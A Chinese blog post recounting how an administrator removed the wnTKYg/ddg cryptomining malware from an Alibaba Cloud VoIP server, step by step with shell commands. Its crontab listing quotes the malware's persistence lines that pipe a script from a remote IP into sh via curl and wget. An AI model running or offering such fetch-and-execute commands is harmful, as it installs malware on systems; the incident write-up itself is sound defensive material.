记一次服务器被挖矿程序入侵的解决过程
2017-12-05 18:28
3995 查看
公司有台做voip的服务器最近CPU总是跑满,这机器自从交给厂家搭好环境后基本就没怎么管它,于是进去查看进程,top了下(见下图)
这个叫wnTKYg的进程很诡异,已经把CPU吃光了,上网一查,原来是中了挖矿的马。(啊,我的天。这只是一个单核1G内存的阿里云主机)既然被入侵了,那就得干掉它,下面是解决过程:
这是挖矿程序生成的定时任务,不清除掉待会进程又起来了。
因为这台机器上没有做定时任务,所以就直接清除掉了,如果有其他在用的定时任务,不要这样哦。
这台机器并没有上传过公钥文件,所以这就是入侵者留下的咯,删掉删掉。
至此,木马就已经清理完毕了。
参考文档:
http://blog.csdn.net/zimou5581/article/details/73064878
http://blog.csdn.net/u013082989/article/details/51971121
这个叫wnTKYg的进程很诡异,已经把CPU吃光了,上网一查,原来是中了挖矿的马。(啊,我的天。这只是一个单核1G内存的阿里云主机)既然被入侵了,那就得干掉它,下面是解决过程:
1:第一步要先找到这个wnTKYg文件实体,对了还有一个叫ddg.2020的进程。
[root@alitest ~]$ find / -name wnTKYg /tmp/wnTKYg [root@alitest ~]$ find / -name ddg* /tmp/ddg.2020
2:接着把这两个文件的可执行权限拿掉。
[root@alitest ~]$ cd /tmp [root@alitest /tmp]$ chmod -x ddg.2020 wnTKYg
3:杀掉这该死的进程。
[root@alitest /tmp]$ ps -ef | grep -v grep | egrep 'wnTKYg|ddg' | awk '{print $2}' | xargs kill -9
4:清除无用的定时任务。
[root@alitest /tmp]$ crontab -l */5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh */5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh
这是挖矿程序生成的定时任务,不清除掉待会进程又起来了。
[root@alitest /tmp]$ echo > /var/spool/cron/root
因为这台机器上没有做定时任务,所以就直接清除掉了,如果有其他在用的定时任务,不要这样哦。
5:删除挖矿程序。
[root@alitest /tmp]$ rm -f ddg.2020 wnTKYg
6:清除.ssh/下的公钥文件。
[root@alitest ~/.ssh]$ cat authorized_keys ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDUGqxNBCvqd+VNZTcSjyV3bs67sqwXSV+XztaY9QN/DDfeXEfWztdaXPbJvmLE34G ......... ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfxLBb/eKbi0TVVULI8ILVtbv2iaGM+eZbZoCWcD3v/eF1B/VkHAC1YwIhfqkUYudwhxV .................
这台机器并没有上传过公钥文件,所以这就是入侵者留下的咯,删掉删掉。
[root@alitest ~/.ssh]$ rm -f authorized_keys
至此,木马就已经清理完毕了。
小结:
在网上查了一下,发现大部分挖矿入侵都发生在redis上,而我这台服务器并没有部署redis,而是当时厂家给装的一套voip环境,因此我怀疑是voip软件的漏洞导致了此次事件,之后再联系厂家看看。通过这次服务器被入侵的案例,再一次印证了安全的重要性,安全无小事,继续努力吧。参考文档:
http://blog.csdn.net/zimou5581/article/details/73064878
http://blog.csdn.net/u013082989/article/details/51971121
相关文章推荐
- 一次服务器被挖矿的处理解决过程
- 阿里云服务器被挖矿程序minerd入侵的终极解决办法
- 记一次服务器被植入挖矿木马cpu飙升200%解决过程
- 阿里云服务器被入侵挂上了wnTKYg挖矿程序解决办法
- 阿里云服务器被挖矿程序minerd入侵的终极解决办法[转载]
- 阿里云服务器被挖矿minerd入侵的解决办法
- 挖矿程序minerd入侵分析和解决办法
- 阿里云服务器被挖矿minerd入侵的解决办法
- SQLSERVER 占了500多M内存,原来的程序无法一次查询出50多W数据了,记录下这个问题的解决过程。
- SQL SERVER问题解决:已成功与服务器建立连接,但是在登录过程中发生错误。 (provider: 命名管道提供程序, error: 0 - 管道的另一端上无任何进程。)
- 记一次苦逼的服务器被挖矿的清除过程
- 挖矿程序minerd入侵分析和解决办法
- 记一次线上Java程序导致服务器CPU占用率过高的问题排除过程
- 重磅-记一次惊心动魄的阿里云服务器被入侵过程定位
- 记录一次服务器CPU 100%的解决过程
- 服务器被入侵(minerd挖矿程序)
- CentOS 服务器因 Redis 遭遇挖矿程序 minerd 入侵事件记录
- SQLServer 安装过程出错 安装程序配置服务器失败 (解决篇)
- 解决centos被minerd挖矿程序入侵方法
- 记一次服务器被挖矿经历与解决办法